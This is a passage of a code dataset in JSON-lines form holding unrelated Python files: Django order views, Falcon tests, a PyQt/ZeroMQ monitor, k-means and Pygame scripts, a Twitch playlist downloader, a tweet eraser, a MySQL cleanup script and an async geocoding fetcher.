json: {toppings_prices_json}\")\n\n # insert topping and prices in json object for HttpResponse\n data = {\n # get toppings and prices\n \"toppings\": toppings_json,\n \"toppings_prices\": toppings_prices_json\n }\n\n return JsonResponse(data)\n\n# ADMIN VIEWS\n# Display all the users orders to admin users\ndef users_orders(request):\n\n if request.user.is_authenticated and request.user.is_superuser:\n # get shopping carts, excluding those that are unconfirmed\n shopping_carts = ShoppingCart.objects.exclude(status=\"unconfirmed\")\n print(f\"GOT USERS ORDERS FROM DB: {shopping_carts}\")\n status_choices = ShoppingCart.status_choices\n\n # pass data to context\n context = {\n \"shopping_carts\": shopping_carts,\n \"status_choices\": status_choices\n }\n\n return render(request, \"users_orders.html\", context)\n\n# change the status of the shopping cart\n@require_http_methods([\"POST\"])\ndef change_cart_status(request):\n if request.user.is_superuser:\n # get client values\n cart_id = request.POST[\"cart_id\"]\n status_selected = request.POST[\"status_selected\"]\n\n # change status to unconfirmed only if no unconfirmed carts exists as no more than one unconfirmed cart can exist per user\n if ShoppingCart.objects.filter(username=request.user, status=\"unconfirmed\").count()>=1:\n data = {\"message\": \"User already has orders in the shopping cart, delete the other cart first to change the status\"}\n\n # change shopping cart status\n else:\n shopping_cart = ShoppingCart.objects.get(id=cart_id)\n print(f\"OLD SHOPPING CART STATUS: {shopping_cart}\")\n shopping_cart.status = status_selected\n shopping_cart.save()\n print(f\"new 
shopping cart status: {ShoppingCart.objects.get(id=cart_id)}\")\n # pass success message to client\n data = {\"message\": \"Shopping cart with id \"+cart_id+\", changed status succesfully to \"+status_selected}\n\n return JsonResponse(data)\n\n# USER AUTH FUNCTIONS\n# Register view\ndef register_view(request):\n\n # check if user if authenticated\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"), {\"message\": \"user is already registered, logout to register another username\"})\n\n # get form info via POST\n if request.method == \"POST\":\n first_name = request.POST[\"first_name\"]\n last_name = request.POST[\"last_name\"]\n email = request.POST[\"email\"]\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n password_check = request.POST[\"password_check\"]\n\n\n # server-side check of form inputs: input of all fields and successful password check\n if not first_name or not last_name or not email or not username or not password or not password_check:\n return render(request, \"register.html\", {\"message\": \"please enter all required fields\"})\n elif password!=password_check:\n return render(request, \"register.html\", {\"message\": \"passwords don't match\"})\n\n # check if username or email exists\n try:\n duplicate_username = User.objects.get(username=username)\n duplicate_email = User.objects.get(email=email)\n return render(request, \"register.html\", {\"message\": \"username and/or email already exists\"})\n\n except User.DoesNotExist:\n # create user and commit to database\n user = User.objects.create_user(username=username, first_name=first_name, last_name=last_name, email=email, password=password)\n user.save()\n\n # login user and redirect to index\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"), {\"message\": \"user registered\"})\n\n else:\n return render(request, \"register.html\")\n\n\n# Login view\ndef login_view(request):\n\n if request.method == \"POST\":\n # get form info via POST\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n\n user = authenticate(request, username = username, password = password)\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"login.html\", {\"message\": \"invalid credentials\"})\n\n else:\n return render(request, \"login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return render(request, \"login.html\", {\"message\": \"user logged out\"})\n\n# Logout view\n","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"175145449","text":"\nimport falcon\nimport falcon.testing as testing\n\n\nclass TestResponseBody(testing.TestBase):\n\n def test_append_body(self):\n text = \"Hello beautiful world! 
\"\n resp = falcon.Response()\n resp.body = \"\"\n\n for token in text.split():\n resp.body += token\n resp.body += \" \"\n\n self.assertEqual(resp.body, text)\n\n def test_redirect(self):\n resp = falcon.Response()\n resp.redirect('http://localhost/anything')\n self.assertEqual(resp.status, \"303 See Other\")\n self.assertEqual(resp._headers['Location'], 'http://localhost/anything')\n\n def test_redirect_permanent(self):\n resp = falcon.Response()\n resp.redirect('http://localhost/anything', permanent=True)\n self.assertEqual(resp.status, \"301 Moved Permanently\")\n self.assertEqual(resp._headers['Location'], 'http://localhost/anything')\n\n","sub_path":"tests/test_response_body.py","file_name":"test_response_body.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"498807001","text":"##############################################################################\n#\n# Copyright (c) 2002 Zope Corporation and Contributors. All Rights Reserved.\n\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\n\"\"\"\nClose properly the <input /> tag\n\"\"\"\n\nimport ZTUtils.Zope\nfrom ZTUtils.Zope import complex_marshal\nimport cgi\n\ndef make_hidden_input(*args, **kwargs):\n '''Construct a set of hidden input elements, with marshalling markup.\n\n If there are positional arguments, they must be dictionaries.\n They are combined with the dictionary of keyword arguments to form\n a dictionary of query names and values.\n\n Query names (the keys) must be strings. Values may be strings,\n integers, floats, or DateTimes, and they may also be lists or\n namespaces containing these types. 
All arguments are marshalled with\n complex_marshal().\n '''\n\n d = {}\n for arg in args:\n d.update(arg)\n d.update(kwargs)\n\n hq = lambda x:cgi.escape(x, quote=True)\n qlist = complex_marshal(d.items())\n for i in range(len(qlist)):\n k, m, v = qlist[i]\n qlist[i] = ('<input type=\"hidden\" name=\"%s%s\" value=\"%s\" />'\n % (hq(k), m, hq(str(v))))\n\n return '\\n'.join(qlist)\n\nZTUtils.Zope.make_hidden_input = make_hidden_input\nZTUtils.make_hidden_input = make_hidden_input\n\n","sub_path":"product/ERP5Type/patches/make_hidden_input.py","file_name":"make_hidden_input.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"413307571","text":"import os, sys, shutil, glob\nimport time, datetime\nimport math, random\nfrom taggedimage import TaggedImage\nfrom augmentation import AugmentedImage, build_all_possible_augs, AUG_FLIP  # AUG_FLIP is assumed to be defined in the augmentation module\n\nclass ImageSet(object):\n\n\tdef __init__(self):\n\t\tself.images = []\n\t\tself.augmented_images = []\n\n\tdef load_arr(self, arr):\n\t\tfor i in arr:\n\t\t\tself.images.append(i)\n\t\tself.augmented_images = []\n\n\tdef load_dir(self, dirpath, whichstick=\"default\", loadaugs = False):\n\t\tg = glob.glob(os.path.join(dirpath, \"*.jpg\"))\n\t\tarr = []\n\t\tfor fname in g:\n\t\t\tarr.append(TaggedImage(fname, whichstick))\n\t\tif loadaugs:\n\t\t\taug_arr = []\n\t\t\tad = glob.glob(os.path.join(dirpath, \"aug_*\"))\n\t\t\tfor d in ad:\n\t\t\t\t# each aug_* directory encodes its augmentation in the directory name,\n\t\t\t\t# so the name and the flip flag are derived per directory\n\t\t\t\taug_name = os.path.basename(d)[4:]\n\t\t\t\tflip = AUG_FLIP in aug_name\n\t\t\t\tg = glob.glob(os.path.join(d, \"*.jpg\"))\n\t\t\t\tfor fname in g:\n\t\t\t\t\ti = TaggedImage(fname, whichstick, flip)\n\t\t\t\t\taug_arr.append(i)\n\t\t\tself.augmented_images = aug_arr\n\t\tself.images = arr\n\n\tdef sort(self, reverse=False):\n\t\tself.images.sort(key=lambda x: x.sequence, reverse=reverse)\n\t\tself.augmented_images.sort(key=lambda x: x.sequence, reverse=reverse)\n\n\tdef shuffle(self):\n\t\trandom.shuffle(self.images)\n\t\trandom.shuffle(self.augmented_images)\n\n\tdef get_subset(self, every, offset, invert=False, allow_aug=False):\n\t\ti = 0\n\t\tj = 0\n\t\tcnt1 = len(self.images)\n\t\tif allow_aug:\n\t\t\tcnt2 = len(self.augmented_images)\n\t\telse:\n\t\t\tcnt2 = 0\n\t\tcnt = cnt1 + cnt2\n\t\tarr = []\n\t\twhile i < cnt and j < cnt:\n\t\t\tj = i + offset\n\t\t\tto_add = False\n\t\t\tif (j % every) == 0:\n\t\t\t\tto_add = True\n\t\t\tif invert:\n\t\t\t\tto_add = not to_add\n\t\t\tif to_add:\n\t\t\t\tif j < cnt1:\n\t\t\t\t\tarr.append(self.images[j])\n\t\t\t\telif j < cnt and allow_aug:\n\t\t\t\t\tarr.append(self.augmented_images[j - cnt1])\n\t\t\ti += 1\n\t\tnew_set = ImageSet()\n\t\tnew_set.load_arr(arr)\n\t\treturn new_set\n\n\tdef augment_all(self, aug_list, transform = False):\n\t\tj = 0\n\t\tfor i in self.images:\n\t\t\taimg = AugmentedImage(i.fpath, whichstick = i.whichstick, xform = transform)\n\t\t\tfor aug in aug_list:\n\t\t\t\taimg.augment(aug)\n\t\t\t\taimg.save()\n\t\t\t\taimg.reload()\n\t\t\t\tj += 1\n\t\t\t\tprint(\"Saved %d %s %s\" % (j, aug, aimg.fname))\n\n\tdef augment_all_possibilities(self, transform = False):\n\t\tpossibilities = build_all_possible_augs()\n\t\tself.augment_all(possibilities, transform = transform)\n\n\tdef copy_to(self, dirpath):\n\t\ttry:\n\t\t\tos.makedirs(dirpath)\n\t\texcept FileExistsError:\n\t\t\tpass\n\t\tfor f in self.images:\n\t\t\ttry:\n\t\t\t\tshutil.copyfile(f.fpath, os.path.join(dirpath, f.fname))\n\t\t\texcept Exception as ex:\n\t\t\t\tprint(\"Exception copying file '%s' to '%s', 
error: %s\" % (f.fpath, dirpath, str(ex)))\n\n\tdef save_to(self, dirpath, xform=False):\n\t\tfor f in self.images:\n\t\t\tif xform:\n\t\t\t\tf.transform()\n\t\t\tf.save_to(dirpath)","sub_path":"sloth/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"23667523","text":"class Matrix:\n def __init__(self, row, col, data):\n self.row=row\n self.col=col\n self.data=data\n\n def __add__(self, other):\n res = Matrix(2,2,[[0,0],[0,0]])\n for r in range(self.row):\n for c in range(self.col):\n res.data[r][c] = self.data[r][c] + other.data[r][c]\n return res\n \n def __str__(self):\n return str(self.data)\n \ndata = [[1,2],[3,4]]\nmat1=Matrix(2,2,data)\ndata = [[2,4],[6,8]]\nmat2=Matrix(2,2,data)\n\nmat3 = mat1 + mat2\nprint(mat3)\n","sub_path":"Python/연산자 중복 정의.py","file_name":"연산자 중복 정의.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"624461949","text":"import sys\r\nimport zmq\r\nimport subprocess\r\nimport os\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QLabel\r\nfrom PyQt5.QtCore import QThread, pyqtSignal\r\n\r\nimport config\r\n\r\nfrom Ui_mainwindow import Ui_mainWindow \r\nfrom Ui_monitorWindow import Ui_Monitor\r\n\r\nfrom serial_manager import SerialManager\r\nfrom console import ConsoleWidget\r\n\r\n\r\nclass AppWindow(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.ui = Ui_mainWindow()\r\n self.styleFile = open( \"styles.qss\" ).read()\r\n self.setStyleSheet(self.styleFile)\r\n self.ui.setupUi(self)\r\n self.socketThread = None\r\n #self.show()\r\n self.ui.buttonConnect.clicked.connect(self.openMonitor)\r\n\r\n def openMonitor(self):\r\n print(\"opening\")\r\n self.connectToSerialDevices()\r\n #self.socketThread = None\r\n self.monitor_window = QWidget()\r\n self.monitor_window.setStyleSheet(self.styleFile)\r\n self.monitor = Ui_Monitor()\r\n self.monitor.setupUi(self.monitor_window)\r\n self.monitor_window.show()\r\n self.console = ConsoleWidget()\r\n self.monitor.console.addWidget(self.console)\r\n self.openSockets()\r\n \r\n\r\n def connectToSerialDevices(self):\r\n print(\"connecting to serial devices\")\r\n bd_port = self.ui.bd_port.text()\r\n ub_port = self.ui.ub_port.text()\r\n subprocess.Popen(\"python serial_manager.py {} {}\".format(bd_port, ub_port), shell=True)\r\n #subprocess.Popen(\"{}/serial_manager.py {} {}\".format(os.getcwd(), bd_port, ub_port), shell=True)\r\n #self.mySerialManager = SerialManager(bd_port, ub_port, config.SERIAL_PUBLISH, config.SERIAL_SUBSCRIBE)\r\n #self.mySerialManager.manage()\r\n \r\n def openSockets(self):\r\n print(\"opening sockets\")\r\n try:\r\n context = zmq.Context()\r\n self.telemSocket = context.socket(zmq.SUB)\r\n self.telemSocket.connect(config.GUI_SUBSCRIBE)\r\n self.telemSocket.setsockopt_string(zmq.SUBSCRIBE, '')\r\n \r\n self.commandSocket = context.socket(zmq.PUB)\r\n self.commandSocket.bind(config.GUI_PUBLISH)\r\n print(\"sockets open\")\r\n except (zmq.ZMQError, zmq.ZMQBindError) as err:\r\n print(\"Error: {}\".format(err))\r\n return\r\n \r\n if(self.socketThread is not None):\r\n self.socketThread.terminate()\r\n self.socketThread.socket.close()\r\n\r\n self.socketThread = SocketMonitor(self.telemSocket)\r\n self.socketThread.signal.connect(self.gotSig)\r\n self.socketThread.start()\r\n\r\n def gotSig(self, msg):\r\n #print(\"\\nReceived New 
Packet...\")\r\n for key in msg:\r\n #print(key)\r\n #print(msg[key][0])\r\n if self.monitor.nff_groupbox.findChild(QLabel, key):\r\n item = self.monitor.nff_groupbox.findChild(QLabel, key)\r\n elif self.monitor.bd_groupbox.findChild(QLabel, key):\r\n item = self.monitor.bd_groupbox.findChild(QLabel, key)\r\n else:\r\n continue\r\n item.setText(str(msg[key][0]))\r\n if msg[key][1] == 1:\r\n item.setStyleSheet('color: #f93943') #red\r\n else:\r\n item.setStyleSheet('color: #063D23') #green\r\n\r\n\r\nclass SocketMonitor(QThread):\r\n signal = pyqtSignal(dict)\r\n def __init__(self,socket):\r\n QThread.__init__(self)\r\n self.socket = socket\r\n\r\n def run(self):\r\n print(\"running\")\r\n while True:\r\n msg = self.socket.recv_pyobj()\r\n #print(msg)\r\n self.signal.emit(msg)\r\n\r\napp = QApplication(sys.argv)\r\nw = AppWindow()\r\n#w.openSockets()\r\n\r\nw.show()\r\n#w.connectToSerialDevices()\r\n\r\nsys.exit(app.exec_())","sub_path":"GSE/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"159124503","text":"from pygame import draw\nfrom pygame import Surface\nfrom pygame import display\nfrom pygame.font import Font\nimport Color\nimport Settings\nimport Text\n\n\nclass Screen(object):\n TOP_LEFT = 0\n CENTER = 1\n\n def __init__(self, surface, fps_clock):\n self.surface = surface\n self.fps_clock = fps_clock\n\n def draw_text_screen(self, text, color, over=True, shadow=False, shadow_color=Color.GRAY, text_dist=50):\n if over:\n self.surface.fill(Color.BG_COLOR)\n font_small = Font(Settings.FONT_NAME, Settings.FONT_SIZE)\n font_large = Font(Settings.FONT_NAME, Settings.FONT_SIZE_LARGE)\n if shadow and shadow_color is not None:\n self.draw_text(text, font_large, shadow_color, Settings.WINDOW_WIDTH / 2 + Settings.SHADOW_OFFSET,\n Settings.WINDOW_HEIGHT / 2 + Settings.SHADOW_OFFSET, Screen.CENTER)\n self.draw_text(text, font_large, color, Settings.WINDOW_WIDTH / 2, Settings.WINDOW_HEIGHT / 2, Screen.CENTER)\n self.draw_text(Text.PRESS_TO_PLAY, font_small, color, Settings.WINDOW_WIDTH / 2,\n Settings.WINDOW_HEIGHT / 2 + text_dist, Screen.CENTER)\n\n @classmethod\n def __draw_text__(cls, text, font, color):\n surface = font.render(text, True, color)\n return surface, surface.get_rect()\n\n def draw_text(self, text, font, color, x, y, coord_type):\n text_surf, text_rect = Screen.__draw_text__(text, font, color)\n if coord_type == Screen.CENTER:\n text_rect.center = x, y\n else:\n text_rect.topleft = x, y\n self.surface.blit(text_surf, text_rect)\n\n def draw_buttons(self):\n left_x = Settings.WINDOW_WIDTH / 2 - Settings.BUTTON_SIZE - Settings.BUTTON_GAP_SIZE / 2\n up_y = Settings.WINDOW_HEIGHT / 2 - Settings.BUTTON_SIZE - Settings.BUTTON_GAP_SIZE / 2\n right_x = Settings.WINDOW_WIDTH / 2 + Settings.BUTTON_GAP_SIZE / 2\n down_y = Settings.WINDOW_HEIGHT / 2 + Settings.BUTTON_GAP_SIZE / 2\n centers = [(left_x, up_y), (right_x, up_y), (left_x, down_y), (right_x, down_y)]\n button_dict = {}\n for _color, center in zip(Color.COLORS, centers):\n button_rect = draw.rect(self.surface, _color,\n (center[0], center[1], Settings.BUTTON_SIZE, Settings.BUTTON_SIZE))\n button_dict[_color] = button_rect\n return button_dict\n\n def draw_button_flash(self, button, color, animation_speed=50):\n orig_surf = self.surface.copy()\n flash_surf = Surface((Settings.BUTTON_SIZE, Settings.BUTTON_SIZE))\n flash_surf = flash_surf.convert_alpha()\n flash_color = Color.COLOR_FLASH_DICT[color]\n r, g, b 
= flash_color\n        for start, end, step in ((0, 255, 1), (255, 0, -1)):  # animation loop\n            for alpha in range(start, end, animation_speed * step):\n                self.surface.blit(orig_surf, (0, 0))\n                flash_surf.fill((r, g, b, alpha))\n                self.surface.blit(flash_surf, button.topleft)\n                display.update()\n                self.fps_clock.tick(Settings.FPS)\n        self.surface.blit(orig_surf, (0, 0))","sub_path":"Game/Screen.py","file_name":"Screen.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"63874271","text":"import numpy as np\r\n\r\nn=100\r\nk=2 # 2 columns\r\nx=np.linspace(1,100,n) # generate X coordinates for the 100 samples\r\ny=np.linspace(101,200,n) # generate Y coordinates for the 100 samples\r\ndist = np.zeros([n, k+1]) #line n ,col k, plus one label column: an all-zero matrix with n rows and k+1 columns\r\n\r\n#1. pick the initial centers\r\ncenter0=np.array([x[0],y[0]])\r\ncenter1=np.array([x[1],y[1]])\r\n#2. compute the distances\r\nwhile True: # infinite loop\r\n    for i in range(n):\r\n        dist[i, 0] = np.sqrt((x[i] - center0[0]) ** 2 + (y[i] - center0[1]) ** 2)\r\n        dist[i, 1] = np.sqrt((x[i] - center1[0]) ** 2 + (y[i] - center1[1]) ** 2) # Euclidean distance formula\r\n        # 3. assign each sample to a cluster\r\n        dist[i,k]=dist[i,:2].argmin() # column index of the minimum value\r\n\r\n    # 4. compute the new cluster centers\r\n    index0 = dist[:, k] == 0 # select class-0 samples: compare column k with 0, True where equal\r\n    index1 = dist[:, k] == 1 # select class-1 samples\r\n\r\n    center0_new = np.array([x[index0].mean(), y[index0].mean()]) # new cluster center: mean over the samples selected (True) above\r\n    center1_new = np.array([x[index1].mean(), y[index1].mean()])\r\n    # 5. check whether to stop\r\n    if sum(center0 == center0_new) + sum(center1 == center1_new) == 4:\r\n        break\r\n    center0 = center0_new # update the cluster centers\r\n    center1 = center1_new\r\n\r\nprint(dist)\r\n\r\n\r\n","sub_path":"5.K-means.py","file_name":"5.K-means.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"545659079","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport twitter\r\n\r\napi = twitter.Api(\r\n    consumer_key='YOUR_CONSUMER_KEY',\r\n    consumer_secret='YOUR_CONSUMER_SECRET',\r\n    access_token_key='YOUR_ACCESS_TOKEN_KEY',\r\n    access_token_secret='YOUR_ACCESS_TOKEN_SECRET'\r\n)\r\n\r\nscreen_name = 'YOUR_TWITTER_ID'\r\n\r\nwhile True:\r\n    statuses = api.GetUserTimeline(screen_name=screen_name)\r\n    for s in statuses:\r\n        print(s.text, s.created_at)\r\n        api.DestroyStatus(s.id)\r\n","sub_path":"src/Tweet Eraser without csv.py","file_name":"Tweet Eraser without csv.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"609717481","text":"for a in range(10):\n    print(\"a:\", a)\n    for b in range(20):\n        print(\"b:\", b)\n        if a==5:\n            # Break the inner loop...\n            break\n    else:\n        # Continue if the inner loop wasn't broken.\n        continue\n    # Inner loop was broken, break the outer.\n    break","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"376213556","text":"from PyQt5 import QtCore \nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.QtCore import QTimer \n\nfrom opencv_engine import opencv_engine\nfrom wongwong_utils import WongWongTimer\n\n# videoplayer_state_dict = {\n#     \"stop\":0, \n#     \"play\":1,\n#     \"pause\":2 \n# }\n\nclass video_controller(object):\n    def __init__(self, video_path, ui):\n        self.video_path = video_path\n        self.ui = ui\n        self.qpixmap_fix_width = 800 # 16x9 = 1920x1080 = 1280x720 = 800x450\n        self.qpixmap_fix_height = 450\n        self.current_frame_no = 0\n        self.videoplayer_state = \"pause\"\n        
self.init_video_info()\n self.set_video_player()\n\n def init_video_info(self):\n videoinfo = opencv_engine.getvideoinfo(self.video_path)\n self.vc = videoinfo[\"vc\"]\n self.video_fps = videoinfo[\"fps\"]\n self.video_total_frame_count = videoinfo[\"frame_count\"]\n self.video_width = videoinfo[\"width\"]\n self.video_height = videoinfo[\"height\"]\n\n self.ui.slider_videoframe.setRange(0, self.video_total_frame_count-1)\n self.ui.slider_videoframe.valueChanged.connect(self.getslidervalue)\n\n\n def set_video_player(self):\n self.timer=QTimer() # init QTimer\n self.timer.timeout.connect(self.timer_timeout_job) # when timeout, do run one\n # self.timer.start(1000//self.video_fps) # start Timer, here we set '1000ms//Nfps' while timeout one time\n self.timer.start(1) # but if CPU can not decode as fast as fps, we set 1 (need decode time)\n\n def set_current_frame_no(self, frame_no):\n self.vc.set(1, frame_no) # bottleneck\n\n #@WongWongTimer\n def __get_next_frame(self):\n ret, frame = self.vc.read()\n self.ui.label_framecnt.setText(f\"frame number: {self.current_frame_no}/{self.video_total_frame_count}\")\n self.setslidervalue(self.current_frame_no)\n return frame\n\n def __update_label_frame(self, frame): \n bytesPerline = 3 * self.video_width\n qimg = QImage(frame, self.video_width, self.video_height, bytesPerline, QImage.Format_RGB888).rgbSwapped()\n self.qpixmap = QPixmap.fromImage(qimg)\n\n if self.qpixmap.width()/16 >= self.qpixmap.height()/9: # like 1600/16 > 90/9, height is shorter, align width\n self.qpixmap = self.qpixmap.scaledToWidth(self.qpixmap_fix_width)\n else: # like 1600/16 < 9000/9, width is shorter, align height\n self.qpixmap = self.qpixmap.scaledToHeight(self.qpixmap_fix_height)\n self.ui.label_videoframe.setPixmap(self.qpixmap)\n # self.ui.label_videoframe.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop) # up and left\n self.ui.label_videoframe.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter) # Center\n\n\n def play(self):\n self.videoplayer_state = \"play\"\n\n def stop(self):\n self.videoplayer_state = \"stop\"\n\n def pause(self):\n self.videoplayer_state = \"pause\"\n\n def timer_timeout_job(self):\n if (self.videoplayer_state == \"play\"):\n if self.current_frame_no >= self.video_total_frame_count-1:\n #self.videoplayer_state = \"pause\"\n self.current_frame_no = 0 # auto replay\n self.set_current_frame_no(self.current_frame_no)\n else:\n self.current_frame_no += 1\n\n if (self.videoplayer_state == \"stop\"):\n self.current_frame_no = 0\n self.set_current_frame_no(self.current_frame_no)\n\n if (self.videoplayer_state == \"pause\"):\n self.current_frame_no = self.current_frame_no\n self.set_current_frame_no(self.current_frame_no)\n\n frame = self.__get_next_frame()\n self.__update_label_frame(frame)\n\n def getslidervalue(self):\n self.current_frame_no = self.ui.slider_videoframe.value()\n self.set_current_frame_no(self.current_frame_no)\n\n def setslidervalue(self, value):\n self.ui.slider_videoframe.setValue(self.current_frame_no)\n\n\n\n\n\n\n\n\n","sub_path":"day26_video_player_add_slider_project/video_controller.py","file_name":"video_controller.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"528879575","text":"import requests\nimport sys\nimport json\nimport re\nimport os\nimport string\nimport argparse\n\ndef download_file(url, local_filename):\n print(\"downloading {0}\".format(local_filename))\n CS = 1024\n done = 0\n r = 
requests.get(url, stream=True)\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=CS):\n if not chunk: # filter out keep-alive new chunks\n continue\n f.write(chunk)\n f.flush()\n done += CS\n sys.stdout.write(\"\\r{0:>7.2f} MB\".format(done/float(pow(1024,2))))\n\n\n print(\"done\\n\")\n\ndef download_broadcast(id_):\n\tpattern = \"https://api.twitch.tv/api/channels/{id__}/access_token\"\n\turl = pattern.format(id__=id_)\n\tr = requests.get(url)\n\tif r.status_code != 200:\n\t\traise Exception(\"API returned {0}\".format(r.status_code))\n\ttry:\n\t\tj = r.json()\n\texcept ValueError as e:\n\t\tprint(\"API did not return valid JSON: {}\".format(e))\n\t\tprint(\"{}\".format(r.text))\n\t\tquit()\n\ttemp_token = j['token']\n\ttoken = temp_token.replace(\"\\\\\", \"\")\n\tsig = j['sig']\n\tvideo_url = \"http://usher.twitch.tv/api/channel/hls/\" + id_ + \".m3u8?sig=\" + sig + \"&token=\" + token\n\tprint(video_url)\n\tfilename = id_ + \".m3u8\"\n\tdownload_file(video_url, filename)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('channel_id', help='twitch channel id')\n args = parser.parse_args()\n download_broadcast(args.channel_id)\n","sub_path":"twitch_live_downloader.py","file_name":"twitch_live_downloader.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"255217668","text":"# this script goes through our training data spreadsheet and moves false positives into the rejectedTrainingData table of our database, rather than the primary front-facing one\nimport csv\nimport MySQLdb\nimport MySQLdb.cursors\nimport os\nfrom tqdm import tqdm\nimport sys\n\n# wrapper function for performing cleanup tasks\n# reads cleanup CSV row by row, grabs article data, deletes the article's images, transfers the data to the rejectedTrainingData table, and then removes the article (and any leftover data) from the primary database\ndef cleanup(c,filename,img_dir):\n with open(filename) as csvfile: # change filename appropriately here\n reader = csv.DictReader(csvfile)\n total = len(list(reader))\n csvfile.seek(0,0)\n reader = csv.DictReader(csvfile)\n for row in tqdm(iterable=reader,desc='Training Data',total=total):\n try:\n if row['Code'] != 'R': # only moving irrelevant articles\n ID = row['Article ID'].strip()\n c.execute(\"\"\"SELECT a.url, title, datetime, article_text, GROUP_CONCAT(DISTINCT keyword) as keywords, GROUP_CONCAT(DISTINCT path) as images \n FROM article A NATURAL JOIN article_keywords NATURAL JOIN keyword_instances LEFT JOIN image I ON A.idArticle = I.idArticle \n WHERE A.idArticle=%s LIMIT 1\"\"\",ID)\n if c.rowcount == 1:\n article = c.fetchone()\n if article['images'] is not None:\n delete_images(img_dir,article['images'])\n t = (article['url'],article['datetime'],article['title'],article['article_text'],article['keywords'],row['Code'].strip())\n c.execute(\"\"\"INSERT INTO rejectedTrainingData(url,datetime,title,text,keywords,code) VALUES (%s,%s,%s,%s,%s,%s)\"\"\",t)\n c.execute(\"\"\"DELETE FROM article WHERE idArticle=%s LIMIT 1\"\"\",(ID,))\n except Exception as e:\n print(e)\n continue\n delete_extra_db(c)\n\n# delete images associated with an irrelevant article\ndef delete_images(img_dir,img_str_list):\n images = img_str_list.split(\",\")\n for i in images:\n abs_image_path = img_dir + i\n if os.path.exists(abs_image_path):\n os.remove(abs_image_path)\n\n# deleting articles often results in keywords and entities that 
don't belong to any articles and just take up space, so deleting them here\ndef delete_extra_db(c): \n c.execute(\"\"\"DELETE FROM article_keywords WHERE idKey NOT IN (SELECT DISTINCT idKey FROM keyword_instances)\"\"\")\n c.execute(\"\"\"DELETE FROM image_entities WHERE idEntity NOT IN (SELECT DISTINCT idEntity FROM entity_instances)\"\"\")\n\ndef main():\n if len(sys.argv) < 3:\n print(\"Needs CSV and image folder argument (in that order.\")\n else:\n filename = sys.argv[1]\n img_dir = sys.argv[2]\n if img_dir[-1] != \"/\": img_dir += \"/\" # accounting for trailing slash\n db = MySQLdb.connect(host=os.environ['DB_HOST'],port=int(os.environ['DB_PORT']),user=os.environ['DB_USER'],password=os.environ['DB_PASSWORD'],db=\"SupremeCourtApp\",use_unicode=True,charset=\"utf8\")\n db.autocommit(True)\n c = db.cursor(MySQLdb.cursors.DictCursor)\n cleanup(c,filename,img_dir)\nmain()","sub_path":"misc/data_cleanup.py","file_name":"data_cleanup.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"395772921","text":"# -*- coding: utf-8 -*-\nimport time\nimport asyncio\nfrom aiohttp import ClientSession\nfrom .functions import print_app_in_process_time\nfrom .entity import LineRecord\nfrom . import constants as const\n\n\ntime_start = time.time()\n\n\nasync def fetch_and_write_data(item, n):\n async with ClientSession() as session:\n await asyncio.sleep(0.04*n)\n async with session.get(item.url) as response:\n response = await response.json()\n\n if response['status'] == 'OK':\n latitude = response['results'][0]['geometry']['location']['lat']\n longitude = response['results'][0]['geometry']['location']['lng']\n\n item.completed_line = item.line + ';{};{}\\n'.format(\n latitude, longitude\n )\n item.is_done = True\n item.response_status = response['status']\n print_app_in_process_time(\n time_start, 'LineRecord count - {}'.format(n)\n )\n\n\ndef make_part_of_data(part):\n loop 